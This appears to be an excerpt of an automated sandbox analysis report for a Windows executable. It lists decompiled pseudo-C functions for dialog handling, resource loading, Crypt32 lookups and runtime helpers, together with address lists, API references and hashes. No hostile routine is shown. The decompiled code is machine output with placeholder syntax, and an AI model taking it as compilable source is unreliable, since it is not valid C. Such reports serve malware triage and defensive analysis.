					if(_t294 != 9) {
						goto L172;
					}
					L98:
					E0101CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 1);
					goto L99;
				}
			}

0x0101c40e
0x0101c40e
0x0101c40e
0x0101c40e
0x0101c40e
0x0101c410
0x0101c418
0x0101c426
0x00000000
0x00000000
0x0101c42c
0x0101c42c
0x0101c434
0x0101c435
0x0101c43a
0x0101c43b
0x0101c43e
0x00000000
0x00000000
0x0101c444
0x0101c444
0x0101c444
0x0101c447
0x0101c44a
0x0101c44c
0x0101c44f
0x0101c455
0x0101c457
0x0101c458
0x0101c45e
0x0101c45f
0x0101c45f
0x0101c464
0x0101c468
0x00000000
0x00000000
0x0101c46a
0x0101c472
0x00000000
0x00000000
0x0101c474
0x0101c479
0x0101c480
0x0101c485
0x0101c48c
0x0101c48e
0x0101c490
0x0101c497
0x0101c49e
0x0101c4a2
0x0101c4a2
0x0101c4a8
0x0101c4af
0x0101c4b6
0x0101c4ba
0x0101c4ba
0x0101c4bb
0x0101c4bd
0x0101c4c3
0x0101c4c4
0x0101c4c4
0x0101c4c7
0x0101c4c7
0x0101c4ca
0x0101c4ce
0x0101c4e5
0x0101c4e9
0x0101c4f2
0x0101c500
0x0101c500
0x0101c4f2
0x0101ca5c
0x0101ca5c
0x0101ca5c
0x0101ca61
0x0101ca65
0x0101ca69
0x0101ca70
0x0101ca77
0x0101ca7a
0x0101ca7f
0x0101ca82
0x0101ca87
0x0101be4b
0x0101be51
0x0101be57
0x0101be57
0x00000000
0x00000000
0x00000000
0x00000000
0x0101be71
0x0101be88
0x0101be8c
0x00000000
0x0101be8e
0x00000000
0x0101be8e
0x0101be8c
0x0101be96
0x00000000
0x00000000
0x0101be9c
0x0101be9c
0x00000000
0x0101bea3
0x0101bea3
0x0101bea6
0x0101beb9
0x0101bedf
0x0101bef3
0x0101bef6
0x0101bf01
0x0101c045
0x0101c045
0x0101c045
0x0101c04d
0x0101c053
0x0101c058
0x0101c05a
0x00000000
0x00000000
0x0101bf0b
0x0101bf13
0x0101bf19
0x0101bf1f
0x0101bfc5
0x0101bfcc
0x0101bfd2
0x0101bfd5
0x00000000
0x00000000
0x0101bfd7
0x0101bfde
0x0101bfe4
0x0101bfe6
0x00000000
0x0101bfe8
0x0101bfe8
0x0101bfea
0x0101bfeb
0x0101bfef
0x0101c003
0x0101c008
0x0101c012
0x0101c018
0x0101c01b
0x0101bfed
0x0101bfed
0x0101bfee
0x00000000
0x0101c01d
0x0101c02b
0x0101c031
0x0101c033
0x0101c03f
0x0101c03f
0x00000000
0x0101c033
0x0101c01b
0x0101bfe6
0x0101bf25
0x0101bf34
0x0101bf41
0x0101bf52
0x0101bf55
0x0101bf58
0x0101bf6b
0x0101bf72
0x0101bf77
0x0101bf79
0x00000000
0x00000000
0x0101bf7f
0x0101bf86
0x0101bf8b
0x0101bf90
0x0101bf9c
0x0101bfa1
0x0101bfa4
0x0101bfab
0x0101bfad
0x0101bfae
0x0101bfb8
0x0101bfbe
0x0101bfbf
0x00000000
0x0101bfbf
0x0101bf5a
0x0101bf61
0x0101bf67
0x0101bf69
0x00000000
0x00000000
0x00000000
0x0101bf69
0x0101c060
0x0101c060
0x0101c06a
0x0101c06a
0x00000000
0x00000000
0x0101c074
0x0101c074
0x0101c076
0x0101c0c9
0x0101c0ce
0x0101c0d7
0x0101c0d8
0x0101c0de
0x0101c0e3
0x0101c0e6
0x0101c0e8
0x0101c0fa
0x0101c0ff
0x0101c100
0x0101c100
0x0101c101
0x0101c103
0x0101c10a
0x0101c10f
0x0101c103
0x00000000
0x00000000
0x0101c115
0x0101c115
0x0101c117
0x0101c127
0x0101c127
0x00000000
0x00000000
0x0101c132
0x0101c132
0x0101c134
0x00000000
0x00000000
0x0101c13a
0x0101c13a
0x0101c141
0x00000000
0x00000000
0x0101c147
0x0101c147
0x0101c149
0x0101c14f
0x0101c151
0x0101c158
0x0101c159
0x0101c160
0x0101c162
0x0101c162
0x0101c169
0x0101c16e
0x0101c174
0x0101c176
0x00000000
0x0101c17c
0x0101c17c
0x0101c17c
0x0101c17f
0x0101c181
0x0101c182
0x0101c185
0x0101c1ae
0x0101c1ae
0x0101c1b1
0x0101c296
0x0101c29f
0x0101c2a4
0x0101c2a4
0x0101c2a6
0x0101c2a6
0x0101c2a8
0x0101c2aa
0x0101c2b1
0x0101c2b6
0x0101c2b7
0x0101c2b8
0x0101c2ba
0x0101c2bc
0x0101c2c0
0x0101c2c2
0x0101c2c2
0x0101c2c4
0x0101c2c4
0x0101c2c0
0x0101c2c8
0x0101c2ce
0x0101c2db
0x0101c2e2
0x0101c2f2
0x0101c2fc
0x0101c30a
0x0101c310
0x0101c318
0x0101c31d
0x0101c31e
0x0101c31f
0x0101c321
0x0101c335
0x0101c335
0x00000000
0x0101c321
0x0101c1b7
0x0101c1b7
0x0101c1ba
0x0101c1c7
0x0101c1c7
0x0101c1ca
0x0101c1cc
0x0101c1cd
0x0101c1cf
0x0101c1d0
0x0101c1d5
0x0101c1da
0x0101c1e0
0x0101c1e2
0x0101c1e4
0x0101c1e7
0x0101c1ee
0x0101c1ef
0x0101c1f5
0x0101c1f6
0x0101c1f9
0x0101c1fa
0x0101c1fb
0x0101c200
0x0101c203
0x0101c209
0x0101c212
0x0101c215
0x0101c21a
0x0101c21c
0x0101c21e
0x0101c220
0x0101c220
0x0101c222
0x0101c222
0x0101c224
0x0101c224
0x0101c22c
0x0101c233
0x0101c235
0x0101c23c
0x0101c242
0x0101c244
0x0101c245
0x0101c24d
0x0101c25c
0x0101c25c
0x0101c24d
0x0101c267
0x0101c269
0x0101c278
0x0101c27e
0x0101c284
0x0101c28f
0x0101c28f
0x00000000
0x0101c284
0x0101c1bc
0x0101c1bc
0x0101c1c1
0x00000000
0x00000000
0x00000000
0x0101c1c1
0x0101c187
0x0101c187
0x0101c18b
0x00000000
0x00000000
0x0101c18d
0x0101c18d
0x0101c190
0x0101c192
0x0101c195
0x00000000
0x0101c19b
0x0101c1a4
0x00000000
0x0101c1a4
0x0101c195
0x00000000
0x0101c340
0x0101c340
0x0101c341
0x0101c346
0x0101c348
0x0101c34a
0x0101c34b
0x0101c34b
0x00000000
0x0101c381
0x0101c381
0x0101c388
0x0101c38a
0x0101c38a
0x0101c38c
0x0101c3bb
0x0101c3bb
0x0101c3c1
0x00000000
0x0101c3c1
0x0101c38e
0x0101c38e
0x0101c38e
0x0101c391
0x0101c3aa
0x0101c3aa
0x0101c3b0
0x0101c3b0
0x00000000
0x0101c3b0
0x0101c393
0x0101c393
0x0101c393
0x0101c396
0x00000000
0x00000000
0x0101c398
0x0101c398
0x0101c398
0x0101c39b
0x00000000
0x00000000
0x0101c3a1
0x0101c3a1
0x00000000
0x00000000
0x00000000
0x00000000
0x0101c534
0x0101c534
0x0101c537
0x0101c6b8
0x0101c6b8
0x0101c6bb
0x0101c6c1
0x0101c6c8
0x0101c6ca
0x0101c6ca
0x0101c6d4
0x0101c6d4
0x00000000
0x0101c6bb
0x0101c53d
0x0101c53d
0x0101c543
0x0101c551
0x0101c55d
0x0101c55f
0x0101c561
0x0101c566
0x0101c566
0x0101c566
0x0101c57e
0x0101c58b
0x0101c590
0x0101c592
0x00000000
0x00000000
0x0101c564
0x0101c564
0x0101c564
0x0101c565
0x0101c565
0x0101c594
0x0101c59e
0x0101c5a4
0x0101c5ac
0x00000000
0x00000000
0x0101c5b2
0x0101c5b2
0x0101c5b9
0x00000000
0x00000000
0x0101c5bf
0x0101c5bf
0x0101c5c1
0x0101c5c8
0x0101c5ce
0x0101c5d0
0x0101c5d1
0x0101c5d6
0x0101c5d7
0x0101c5d8
0x0101c5da
0x0101c62e
0x0101c62e
0x0101c636
0x0101c644
0x0101c655
0x0101c663
0x0101c663
0x0101c66f
0x0101c674
0x0101c676
0x0101c686
0x0101c690
0x0101c695
0x0101c698
0x00000000
0x0101c69e
0x0101c69e
0x0101c6a3
0x0101c6a3
0x0101c6a5
0x0101c6ac
0x0101c6b2
0x00000000
0x0101c6b2
0x0101c698
0x0101c5dc
0x0101c5dc
0x0101c5de
0x0101c5e0
0x0101c5e7
0x00000000
0x00000000
0x0101c5e9
0x0101c5e9
0x0101c5eb
0x0101c5f1
0x0101c5f1
0x0101c5f1
0x0101c5f5
0x00000000
0x00000000
0x0101c5f7
0x0101c5f7
0x0101c5f8
0x0101c5fe
0x0101c601
0x0101c603
0x0101c606
0x00000000
0x00000000
0x0101c608
0x00000000
0x0101c608
0x0101c60a
0x0101c615
0x0101c61f
0x0101c624
0x0101c624
0x0101c626
0x00000000
0x00000000
0x0101c6e0
0x0101c6e0
0x0101c6e3
0x0101c6e5
0x0101c6ec
0x0101c6ee
0x0101c6f4
0x0101c6f5
0x0101c6fa
0x0101c6fb
0x0101c6fb
0x0101c700
0x0101c703
0x0101c709
0x0101c709
0x0101c70e
0x00000000
0x00000000
0x0101c71a
0x0101c71a
0x0101c71d
0x00000000
0x00000000
0x0101c723
0x0101c723
0x0101c725
0x0101c72c
0x0101c734
0x0101c73a
0x0101c73f
0x0101c742
0x0101c777
0x0101c77c
0x0101c782
0x0101c783
0x0101c788
0x0101c744
0x0101c744
0x0101c747
0x0101c74d
0x0101c763
0x0101c768
0x0101c769
0x0101c76e
0x0101c74f
0x0101c74f
0x0101c754
0x0101c755
0x0101c75a
0x0101c75a
0x0101c74d
0x0101c78f
0x0101c791
0x0101c798
0x0101c7a6
0x0101c7ad
0x0101c7b2
0x0101c7b3
0x0101c7b4
0x0101c7b6
0x0101c7b7
0x0101c7be
0x0101c807
0x0101c80e
0x0101c813
0x0101c815
0x00000000
0x00000000
0x0101c81b
0x0101c81b
0x0101c81d
0x0101c823
0x0101c82a
0x00000000
0x00000000
0x0101c82c
0x0101c82c
0x0101c82e
0x0101c82f
0x0101c82f
0x0101c82f
0x0101c832
0x0101c835
0x0101c83f
0x0101c83f
0x0101c841
0x0101c843
0x0101c84d
0x0101c852
0x0101c854
0x0101c892
0x0101c892
0x0101c895
0x0101c895
0x0101c897
0x0101c898
0x0101c898
0x00000000
0x0101c898
0x0101c856
0x0101c856
0x0101c858
0x0101c859
0x0101c85b
0x0101c85e
0x0101c873
0x0101c873
0x0101c875
0x0101c876
0x0101c876
0x0101c876
0x0101c879
0x0101c879
0x0101c87e
0x0101c87f
0x0101c885
0x0101c885
0x0101c886
0x0101c88b
0x0101c88c
0x0101c88d
0x00000000
0x0101c88d
0x0101c860
0x0101c860
0x0101c867
0x0101c86a
0x0101c86b
0x00000000
0x0101c86b
0x0101c837
0x0101c837
0x0101c839
0x0101c83a
0x0101c83d
0x00000000
0x00000000
0x00000000
0x0101c89a
0x0101c89a
0x0101c89d
0x0101c89d
0x0101c8a2
0x0101c8a4
0x0101c8a6
0x0101c8a6
0x0101c8a8
0x0101c8a8
0x00000000
0x0101c7c0
0x0101c7c0
0x0101c7c7
0x0101c7d3
0x0101c7d9
0x0101c7da
0x0101c7db
0x0101c7e0
0x0101c7e3
0x0101c7e5
0x0101c7eb
0x0101c7ed
0x0101c7fb
0x0101c800
0x0101c801
0x0101c801
0x0101c8ab
0x0101c8ab
0x0101c8b3
0x0101c8b8
0x0101c8c2
0x0101c8c9
0x0101c8c9
0x0101c8d6
0x0101c8dd
0x0101c8e2
0x0101c8ea
0x0101c8f6
0x0101c8f6
0x0101c903
0x0101c908
0x0101c910
0x0101c91a
0x0101c927
0x0101c92e
0x0101c92e
0x0101c93a
0x0101c941
0x0101c946
0x0101c94e
0x0101c954
0x0101c955
0x0101c956
0x0101c958
0x0101c958
0x0101c96d
0x0101c972
0x0101c97e
0x0101c980
0x0101c991
0x0101c99e
0x00000000
0x0101c982
0x0101c982
0x0101c98d
0x0101c98f
0x0101c9a3
0x0101c9a3
0x0101c9a5
0x0101c9ab
0x0101c9b1
0x0101c9bf
0x0101c9c4
0x0101c9c5
0x0101c9cd
0x0101c9d2
0x0101c9d9
0x0101c9df
0x0101c9e1
0x0101c9e7
0x0101c9ed
0x0101c9ef
0x0101c9f8
0x0101c9fb
0x0101c9fd
0x0101ca06
0x0101ca09
0x0101ca0f
0x0101ca12
0x0101ca1b
0x0101ca2a
0x0101ca2f
0x0101ca37
0x0101ca39
0x0101ca3a
0x0101ca40
0x0101ca41
0x0101ca43
0x0101ca48
0x0101ca48
0x00000000
0x0101ca37
0x00000000
0x0101c98f
0x0101c980
0x00000000
0x0101ca50
0x0101ca50
0x0101ca53
0x0101ca55
0x0101ca55
0x00000000
0x00000000
0x0101c3cd
0x0101c3cd
0x0101c3d5
0x0101c3db
0x0101c3de
0x0101c402
0x0101c3e0
0x0101c3e0
0x0101c3e3
0x0101c3f6
0x0101c3e5
0x0101c3e5
0x0101c3e7
0x0101c3ec
0x0101c3ec
0x0101c3e3
0x00000000
0x00000000
0x0101c50a
0x0101c50a
0x0101c50b
0x0101c510
0x0101c510
0x0101c510
0x0101c513
0x0101c518
0x0101c51e
0x0101c51e
0x0101c524
0x0101c52a
0x0101c52a
0x00000000
0x00000000
0x0101be58
0x0101be58
0x0101be5d
0x0101be5e
0x0101be5f
0x0101be64
0x0101be6a
0x0101be6d
0x00000000
0x0101be6f
0x0101be6f
0x00000000
0x0101be6f
0x0101be6d
0x0101ca8d
0x0101ca93
0x0101ca9d
0x0101ca9d
0x0101c4d0
0x0101c4d3
0x00000000
0x00000000
0x0101c4d9
0x0101c4e0
0x00000000
0x0101c4e0

APIs

_wcschr.LIBVCRUNTIME ref: 0101C435

Part of subcall function 010117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0100BB05,00000000,.exe,?,?,00000800,?,?,010185DF,?), ref: 010117C2

Strings

HIDE, xrefs: 0101C474
MIN, xrefs: 0101C4A3
MAX, xrefs: 0101C487
<, xrefs: 0101C41E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 30b945ae6919d4c82e2e3d4b16b110754e6d10e83be27a74f380caf19e68df1c
Instruction ID: 8e1c8a129eacffdae342d30b3bd5dbc208ce136101e393401dea8d4b50316dfc
Opcode Fuzzy Hash: 30b945ae6919d4c82e2e3d4b16b110754e6d10e83be27a74f380caf19e68df1c
Instruction Fuzzy Hash: F9319472984209AAEF66DA58CD40EEF77FCEB54304F0040A6EA85D7054EBB9DBC48A50

Uniqueness

Uniqueness Score: -1.00%

Function 0101ADED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101ADED(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0x1040ed0, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t21 != 0) {
					_t24 = E01019E1C(0x65);
				}
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
				} else {
					GetObjectW(_t24, 0x18,  &_v28);
				}
				if(E01019D1A(_t31) != 0) {
					if(_t21 != 0) {
						_t28 = E01019E1C(0x66);
						if(_t28 != 0) {
							DeleteObject(_t24);
							_t24 = _t28;
						}
					}
					_t11 = E01019D5A(_v20);
					_t13 = E01019F5D(_t23, _t35, _t24, E01019D39(_v24), _t11);
					DeleteObject(_t24);
					_t24 = _t13;
				}
				return _t24;
			}

0x0101aded
0x0101aded
0x0101ae03
0x0101ae07
0x0101ae0c
0x0101ae15
0x0101ae15
0x0101ae17
0x0101ae19
0x0101ae2a
0x0101ae31
0x0101ae1b
0x0101ae22
0x0101ae22
0x0101ae3f
0x0101ae44
0x0101ae4d
0x0101ae51
0x0101ae54
0x0101ae5a
0x0101ae5a
0x0101ae51
0x0101ae5f
0x0101ae6f
0x0101ae77
0x0101ae7d
0x0101ae7f
0x0101ae87

APIs

LoadBitmapW.USER32(00000065), ref: 0101ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0101AE22
DeleteObject.GDI32(00000000), ref: 0101AE54
DeleteObject.GDI32(00000000), ref: 0101AE77

Part of subcall function 01019E1C: FindResourceW.KERNEL32(0101AE4D,PNG,?,?,?,0101AE4D,00000066), ref: 01019E2E
Part of subcall function 01019E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0101AE4D,00000066), ref: 01019E46
Part of subcall function 01019E1C: LoadResource.KERNEL32(00000000,?,?,?,0101AE4D,00000066), ref: 01019E59
Part of subcall function 01019E1C: LockResource.KERNEL32(00000000,?,?,?,0101AE4D,00000066), ref: 01019E64

Strings

], xrefs: 0101AE2A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: eacfcb938cdeb030ee6d12cb8d9067f85b5883190a7b05dcb7199fefa3d96acc
Instruction ID: 1f3771c0093f089d9310a056f5432ffe649d1e3834bc20ccf2be060798735235
Opcode Fuzzy Hash: eacfcb938cdeb030ee6d12cb8d9067f85b5883190a7b05dcb7199fefa3d96acc
Instruction Fuzzy Hash: 6A010C36641216E7E72036649C14ABF7BFAAF81B55F040115FE80A729CDA3E4C254261

Uniqueness

Uniqueness Score: -1.00%

Function 0101CC90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0101CC90(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E0100130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0x105ecac = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0x105ecac);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0x105ecac, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0101cc91
0x0101cc96
0x0101cc9b
0x0101cca0
0x0101ccb8
0x0101cd1a
0x00000000
0x0101cd1c
0x0101ccba
0x0101ccc0
0x0101ccff
0x0101cd05
0x0101cd14
0x00000000
0x0101cd14
0x0101ccc5
0x0101ccd4
0x00000000
0x0101ccd4
0x0101ccca
0x0101cccd
0x0101ccf1
0x0101ccf7
0x0101ccda
0x0101ccdb
0x00000000
0x0101ccdb
0x0101ccd2
0x0101ccd8
0x00000000
0x0101ccd8
0x00000000

APIs

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

EndDialog.USER32(?,00000001), ref: 0101CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0101CD14

Strings

RENAMEDLG, xrefs: 0101CCA8

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: f32f145c66f7f096129b35a47da4ad9298abff36c409b159b092012075f3a88c
Instruction ID: da41570187052a56185408877f05ece484116f64cdbe7c58ff1e5645d4358d18
Opcode Fuzzy Hash: f32f145c66f7f096129b35a47da4ad9298abff36c409b159b092012075f3a88c
Instruction Fuzzy Hash: 8C01F5322C43187AF2215E689E09F6B7FDDAB5A742F040410F3C2A60D9C66FD9058765

Uniqueness

Uniqueness Score: -1.00%

Function 010275C2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027573,00000000,?,01027513,00000000,0103BAD8,0000000C,0102766A,00000000,00000002), ref: 010275E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 010275F5
FreeLibrary.KERNEL32(00000000,?,?,?,01027573,00000000,?,01027513,00000000,0103BAD8,0000000C,0102766A,00000000,00000002), ref: 01027618

Strings

mscoree.dll, xrefs: 010275DB
CorExitProcess, xrefs: 010275ED

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f849f9887bb770f9594162ca22ddd24378c649f3a4b88ca65327d7c9a02f4225
Instruction ID: 8cb89770564c17f709e4f078841421939ece4907cc5e16545efff67ddd9279f4
Opcode Fuzzy Hash: f849f9887bb770f9594162ca22ddd24378c649f3a4b88ca65327d7c9a02f4225
Instruction Fuzzy Hash: A0F0AF30A0421CBFDB219B98DC49B9DBFBCFF08711F0001A8F885AA150DB798940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100EB73, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100EB73(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E01010085(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0100eb74
0x0100eb7a
0x0100eb81
0x0100eb86
0x0100eb8a
0x0100eb9f
0x0100eba2
0x0100eba8
0x0100eba8
0x0100ebab
0x00000000
0x0100ebab
0x0100ebb0

APIs

Part of subcall function 01010085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 010100A0
Part of subcall function 01010085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100EB86,Crypt32.dll,00000000,0100EC0A,?,?,0100EBEC,?,?,?), ref: 010100C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100EB92
GetProcAddress.KERNEL32(010481C0,CryptUnprotectMemory), ref: 0100EBA2

Strings

CryptUnprotectMemory, xrefs: 0100EB98
Crypt32.dll, xrefs: 0100EB7C
CryptProtectMemory, xrefs: 0100EB8C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 84a4c7ad113b6a91441a57f46d3d31699e70dbf64e2dbf99304af893d8de0472
Instruction ID: bc6b84cb9d813fb47f30ecc8351c861d069caa47b868744dde99e393e7e656db
Opcode Fuzzy Hash: 84a4c7ad113b6a91441a57f46d3d31699e70dbf64e2dbf99304af893d8de0472
Instruction Fuzzy Hash: 31E04F70900741DEDB329F39D898B42FEE87B14601F04C85EF4D6EF144D6B9D0808B60

Uniqueness

Uniqueness Score: -1.00%

Function 01027DD9, Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E01027DD9(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x103e668; // 0x7ecdc17e
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E010273F2( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0101E531(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0101E531(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0101E531(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
